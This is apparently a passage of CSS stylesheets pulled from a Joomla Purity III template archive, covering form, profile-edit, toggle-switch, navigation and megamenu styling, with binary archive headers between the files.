}
.com_config.view-modules #options .accordion-body .nav-tabs {
  background: transparent;
}
.com_config #modules-form .input-append .add-on,
.com_config #modules-form .input-prepend .add-on {
  width: 35px;
}
.com_config #modules-form .input-append input,
.com_config #modules-form .input-prepend input {
  display: inline-block;
}
.com_config #modules-form .input-append .btn,
.com_config #modules-form .input-prepend .btn {
  border: 1px solid #cccccc;
}
.com_config #modules-form .accordion-group {
  margin-bottom: 20px;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle {
  border: 1px solid #ddd;
  border-radius: 5px 5px 0 0;
  color: #428bca;
  display: block;
  padding: 10px;
  outline: none;
}
.com_config #modules-form .accordion-group .accordion-heading .accordion-toggle.collapsed {
  border-radius: 5px;
  color: #666;
}
.com_config #modules-form .accordion-group .accordion-body {
  border: 1px solid #ddd;
  border-top: 0;
  border-radius: 0 0 5px 5px;
  padding-top: 20px;
}
.com_config #modules-form .accordion-group .accordion-body .nav-tabs {
  border-bottom: 0;
}
.com_config #modules-form .radio input[type="radio"] {
  margin-left: 0;
  position: relative;
}
.com_config #modules-form .radio label {
  padding-left: 5px;
  padding-right: 20px;
}
.controls select {
  vertical-align: middle;
  width: 220px;
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #cccccc;
  background-color: #ffffff;
}
.edit.item-page #jform_com_fields_checkboxs label.checkbox,
.profile-edit #jform_com_fields_checkboxs label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.edit.item-page #jform_com_fields_checkboxs input[type="checkbox"],
.profile-edit #jform_com_fields_checkboxs input[type="checkbox"] {
  margin-left: 0;
  margin-top: -2px;
  position: relative;
  vertical-align: middle;
  width: auto;
}
.edit.item-page .minicolors-input,
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.edit.item-page .chzn-container .chzn-search:before,
.profile-edit .chzn-container .chzn-search:before,
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  display: table;
  content: " ";
}
.edit.item-page .chzn-container .chzn-search:after,
.profile-edit .chzn-container .chzn-search:after {
  clear: both;
}
.profile-edit #jform_com_fields_user_checkbox label.checkbox {
  display: inline-block;
  margin-right: 10px;
}
.profile-edit #jform_com_fields_user_checkbox input {
  position: relative;
  margin-left: 0;
  margin-right: 5px;
  width: auto;
}
.profile-edit .minicolors-input {
  height: 28px;
  width: auto;
}
.profile-edit #jform_com_fields_user_image_chzn .chzn-search {
  box-sizing: border-box;
}
.profile-edit #jform_com_fields_user_image_chzn ul.chzn-results {
  box-sizing: border-box;
  padding: 0;
  margin: 0;
  width: 100%;
}
.profile-edit #jform_com_fields_user_calendar {
  float: left;
}
.profile-edit .chzn-container-single,
.profile-edit .chzn-container {
  float: left;
  margin-right: 10px;
}
@media screen and (max-width: 360px) {
  .profile-edit .chzn-container-single,
  .profile-edit .chzn-container {
    width: 100% !important;
  }
}
.profile-edit .chzn-container-single .chzn-drop,
.profile-edit .chzn-container .chzn-drop {
  box-sizing: border-box !important;
}
.j40 .profile-edit .t3onoff,
.j50 .profile-edit .t3onoff {
  min-height: auto;
  border: 0;
  height: auto;
  width: auto;
}
.j40 .profile-edit .t3onoff .radio,
.j50 .profile-edit .t3onoff .radio {
  display: flex;
  align-items: center;
  min-height: auto;
  padding: 0;
}
.j40 .profile-edit .t3onoff .radio .form-check,
.j50 .profile-edit .t3onoff .radio .form-check {
  display: flex;
  align-items: center;
}
.j40 .profile-edit .t3onoff .radio .form-check input[type="radio"],
.j50 .profile-edit .t3onoff .radio .form-check input[type="radio"] {
  display: inline-block;
}
.j40 .profile-edit .t3onoff label,
.j50 .profile-edit .t3onoff label {
  padding: 0;
  margin: 0;
  position: relative;
  top: auto;
  left: auto;
  height: auto;
  text-indent: 0;
  text-transform: none;
  width: auto;
}
.j40 .profile-edit .t3onoff label.active,
.j50 .profile-edit .t3onoff label.active {
  background: transparent;
}
.j40 .profile-edit .t3onoff label::before,
.j50 .profile-edit .t3onoff label::before,
.j40 .profile-edit .t3onoff label::after,
.j50 .profile-edit .t3onoff label::after {
  display: none;
}
.profile #users-profile-core {
  width: 100%;
}
.profile .dl-horizontal dd {
  margin-bottom: 10px;
  border-bottom: 1px dashed #ddd;
  padding-bottom: 10px;
}
.profile .dl-horizontal dd img {
  max-width: 100%;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  display: table;
  content: " ";
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
}
#editor-xtd-buttons {
  margin-right: 40px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window.view-modules .well .control-label {
  display: inline-block;
}
.window.view-modules .well .controls {
  display: inline-block;
  vertical-align: middle;
  margin-left: 10px;
}
.window.view-modules .control-group:after {
  content: "";
  clear: both;
  display: table;
}
.window.view-modules #filter-bar {
  margin-bottom: 10px;
}
.window.view-modules #filter-bar .btn-group button {
  margin-top: 0;
}
.com_config.view-modules .btn-group label {
  float: left;
  padding-left: 10px !important;
  padding-right: 10px !important;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: left;
}
.window #imageForm #upbutton {
  border: 1px solid #cccccc;
  float: left;
  padding: 3px 12px;
  margin-left: 5px;
}
.window #imageForm .pull-right {
  margin-right: 40px;
}
.window #imageForm .well:after {
  display: table;
  content: "";
  clear: both;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  display: table;
  content: " ";
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: left;
  margin-right: 10px;
  margin-left: 10px;
}
.window.view-articles .filter {
  overflow: visible;
}
.window.view-articles .filter .btn-toolbar .icon-remove,
.window.view-articles .filter .btn-toolbar .icon-search {
  margin-right: 5px;
}
.window.view-articles .filters {
  float: none !important;
}
.window.view-articles .filters .chzn-container {
  display: inline-block;
}
.window.view-articles .filters .chzn-drop input {
  float: none;
}
.t3onoff {
  border: 1px solid #aaa;
  border-radius: 0;
  display: block;
  height: 30px;
  overflow: hidden;
  padding: 0;
  position: relative;
  white-space: nowrap;
  width: 90px;
  
  
  
  
  
}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  left: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../plugins/system/t3/base-bs3/imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  -webkit-transition: all 250ms;
  -o-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: right;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  left: 100%;
}
.t3onoff label.off.active:before {
  left: 0%;
}
.t3onoff label.on:before {
  background: #690;
  left: -100%;
}
.t3onoff label.on.active:before {
  left: -0%;
}
.t3onoff label.off:after {
  left: 60%;
}
.t3onoff label.off.active:after {
  left: 0%;
}
.t3onoff label.on:after {
  left: 0%;
}
.t3onoff label.on.active:after {
  left: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-right-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-right-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.window.view-modules .js-stools,
.window.view-articles .js-stools,
.window.view-contacts .js-stools,
.window.view-fields .js-stools,
.window.view-items .js-stools {
  margin-bottom: 20px;
}
.window.view-modules .js-stools .btn,
.window.view-articles .js-stools .btn,
.window.view-contacts .js-stools .btn,
.window.view-fields .js-stools .btn,
.window.view-items .js-stools .btn {
  border: 1px solid #ccc;
  margin-top: 0;
}
.window.view-modules .js-stools .input-append .btn,
.window.view-articles .js-stools .input-append .btn,
.window.view-contacts .js-stools .input-append .btn,
.window.view-fields .js-stools .input-append .btn,
.window.view-items .js-stools .input-append .btn {
  border-left: 0;
}
.window.view-modules .js-stools input,
.window.view-articles .js-stools input,
.window.view-contacts .js-stools input,
.window.view-fields .js-stools input,
.window.view-items .js-stools input {
  display: inline-block;
}
.window.view-modules .js-stools-container-filters .chzn-container-single,
.window.view-articles .js-stools-container-filters .chzn-container-single,
.window.view-contacts .js-stools-container-filters .chzn-container-single,
.window.view-fields .js-stools-container-filters .chzn-container-single,
.window.view-items .js-stools-container-filters .chzn-container-single {
  width: 220px !important;
}
.window.view-modules .js-stools-container-filters .chzn-drop,
.window.view-articles .js-stools-container-filters .chzn-drop,
.window.view-contacts .js-stools-container-filters .chzn-drop,
.window.view-fields .js-stools-container-filters .chzn-drop,
.window.view-items .js-stools-container-filters .chzn-drop {
  box-sizing: border-box !important;
}
.window.view-modules table#moduleList td .label,
.window.view-articles table#moduleList td .label,
.window.view-contacts table#moduleList td .label,
.window.view-fields table#moduleList td .label,
.window.view-items table#moduleList td .label {
  background-color: #999;
  box-sizing: border-box;
  border-radius: 3px;
  display: inline-block;
  font-weight: normal;
  font-size: 100%;
  padding: 10px;
  width: 100%;
}
.window.view-modules table#moduleList td:nth-child(1),
.window.view-articles table#moduleList td:nth-child(1),
.window.view-contacts table#moduleList td:nth-child(1),
.window.view-fields table#moduleList td:nth-child(1),
.window.view-items table#moduleList td:nth-child(1) {
  vertical-align: middle;
}
.window.view-modules .icon-publish:before,
.window.view-articles .icon-publish:before,
.window.view-contacts .icon-publish:before,
.window.view-fields .icon-publish:before,
.window.view-items .icon-publish:before {
  content: "\f00c";
  font-size: 16px;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
  font-family: "FontAwesome";
}
.icon-file-add:before {
  content: "\f0f6";
  font-family: "FontAwesome";
}
.icon-cancel:before {
  content: "\f00d";
  font-family: "FontAwesome";
}
.icon-publish:before {
  content: "\f00c";
}
.icon-unpublish:before {
  content: "\f00d";
}
.icon-featured:before {
  content: "\f005";
}
.icon-unfeatured:before {
  content: "\f005";
}
.button2-left,
.button2-left div {
  float: left;
}
.button2-right,
.button2-right div {
  float: right;
}
.button2-left {
  margin: 5px 5px 0 0;
}
.button2-right {
  margin: 5px 0 0 5px;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #eeeeee;
  border: 1px solid #e1e1e1;
  color: #999999;
  cursor: pointer;
  display: block;
  float: left;
  padding: 2px 10px;
  border-radius: 0;
}
.button2-left span,
.button2-right span {
  color: #999999;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #e1e1e1;
  color: #444444;
  text-decoration: none;
}
.edit.item-page a.modal,
.com_config form a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn,
.com_config form a.modal.btn {
  background: #ffffff;
  text-shadow: 0 1px 0 #fff;
  border-color: #cccccc;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-left: 5px;
}
.layout-pagebreak .form-horizontal .control-group .controls {
  margin-left: 0;
}
[class^="icon-"],
[class*=" icon-"] {
  font-family: FontAwesome3 !important;
}
.view-history .btn-group {
  margin-bottom: 10px;
}
.btn [class^="icon-"],
.btn [class*=" icon-"] {
  margin-right: 5px;
}
.btn span.icon-delete:before {
  content: "\f057";
  display: inline-block;
  height: 16px;
  width: 16px;
  color: #333;
}
body.modal-open .modal.hide {
  background-color: #fff;
  display: block !important;
  left: auto;
  right: auto;
  top: 0;
  bottom: auto;
  transform: translateY(50%);
  z-index: 1050;
}
body.modal-open .modal.hide .iframe {
  border: 1px solid #ddd;
}
.thumbnails-media .imgFolder span {
  line-height: 70px;
}
.j4 joomla-tab {
  margin-bottom: 20px;
}
.j40 joomla-tab-element {
  margin-bottom: 20px;
}
ul.chosen-results {
  clear: both;
}PKӜ�\��VpTT/purity_iii/css/themes/red/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}PKӜ�\h��p7p7&purity_iii/css/themes/red/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-left: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-left: -5px;
  margin-right: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-right: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  left: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  left: auto;
  right: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  left: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  left: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  left: auto;
  right: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  left: 0;
  margin-left: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-left: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-left: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-left: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    left: 0 !important;
    margin-left: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    left: auto;
    right: 0 !important;
    margin-right: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-left: auto;
  margin-right: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-left: -20px;
  margin-right: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-right: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-left: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #cc0000;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-right: 0;
}PKӜ�\���0�X�X&purity_iii/css/themes/red/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: left;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
